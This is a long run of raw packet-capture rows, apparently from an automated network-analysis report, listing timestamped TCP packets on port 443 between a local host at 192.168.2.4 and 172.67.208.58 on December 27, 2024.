                                                                                                                                                                                            Dec 27, 2024 20:23:51.387212038 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.394321918 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.394337893 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.394421101 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.394431114 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.394481897 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.402146101 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.402162075 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.402245045 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.402261019 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.402309895 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.409049988 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.409065008 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.409135103 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.409146070 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.409195900 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.548748016 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.548765898 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.548844099 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.548892021 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.548943996 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.556458950 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.556493998 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.556582928 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.556598902 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.556643009 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.563375950 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.563415051 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.563460112 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.563486099 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.563515902 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.563532114 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.571156979 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.571182966 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.571261883 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.571276903 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.571338892 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.578937054 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.578953028 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.579030037 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.579041958 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.579088926 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.586451054 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.586467028 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.586533070 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.586546898 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.586587906 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.594146013 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.594172001 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.594239950 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.594255924 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.594281912 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.594314098 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.601047039 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.601063013 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.601146936 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.601161957 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.601208925 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.740650892 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.740668058 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.740864992 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.740885019 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.740943909 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.748398066 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.748413086 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.748503923 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.748512983 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.748562098 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.755268097 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.755283117 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.755359888 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.755367994 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.755420923 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.763127089 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.763143063 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.763237000 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.763250113 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.763298035 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.770922899 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.770937920 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.771018028 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.771029949 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.771075964 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.778583050 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.778599024 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.778672934 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.778682947 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.778728962 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.786139011 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.786155939 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.786278009 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.786298990 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.786351919 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.794130087 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.794156075 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.794240952 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.794260025 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.794312954 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.932662964 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.932687044 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.932815075 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.932837963 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.932889938 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.940403938 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.940423012 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.940504074 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.940512896 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.940562963 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.948301077 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.948324919 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.948385000 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.948394060 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.948438883 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.955105066 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.955127001 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.955215931 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.955226898 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.955276012 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.962950945 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.962975025 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.963047981 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.963059902 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.963104963 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.970400095 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.970427036 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.970499039 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.970508099 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.970552921 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.978353024 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.978374958 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.978460073 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.978467941 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.978517056 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.986083984 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.986104012 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.986196995 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.986206055 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.986263990 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.125730038 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.125754118 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.125847101 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.125880003 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.125909090 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.125929117 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.132642031 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.132671118 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.132756948 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.132772923 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.132817984 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.140562057 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.140592098 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.140695095 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.140727043 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.140791893 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.148216963 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.148262978 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.148351908 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.148370028 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.148426056 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.151829958 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.151923895 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.151936054 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.159084082 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.159104109 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.159187078 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.159198999 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.166867018 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.166884899 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.166968107 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.166984081 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.174772024 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.174789906 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.174854040 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.174865961 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.225289106 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.313982964 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.314007998 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.314141989 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.314168930 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.314222097 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.320611954 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.320630074 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.320769072 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.320777893 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.320827961 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.328511000 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.328530073 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.328633070 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.328641891 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.328691006 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.336291075 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.336306095 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.336400986 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.336409092 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.336452961 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.344144106 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.344160080 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.344258070 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.344269037 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.344310045 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.351449013 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.351465940 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.351584911 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.351600885 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.351660967 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.358525038 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.358540058 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.358647108 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.358664036 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.358716011 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.366307974 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.366322041 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.366442919 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.366455078 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.366508007 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.535339117 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.535366058 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.535504103 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.535542965 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.535693884 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.542891979 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.542918921 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.542996883 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.543010950 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.543061972 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.550774097 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.550792933 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.550889969 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.550905943 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.550950050 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.557802916 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.557821989 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.557924986 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.557934999 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.557993889 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.565483093 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.565500975 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.565603018 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.565612078 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.565674067 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.572851896 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.572875977 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.572964907 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.572974920 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.573019981 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.580552101 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.580569983 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.580655098 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.580667973 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.580717087 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.588603973 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.588630915 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.588727951 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.588747978 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.588798046 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.728050947 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.728075027 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.728193998 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.728209019 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.728389978 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.735819101 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.735835075 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.735925913 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.735935926 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.735980988 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.743648052 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.743664026 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.743755102 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.743767023 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.743810892 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.750612974 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.750633955 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.750730038 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.750737906 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.750796080 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.758315086 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.758332968 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.758408070 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.758415937 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.758455038 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.765815973 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.765836000 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.765907049 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.765914917 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.765960932 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:52.773520947 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.773540974 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:52.773612976 CET49747443192.168.2.4172.67.208.58
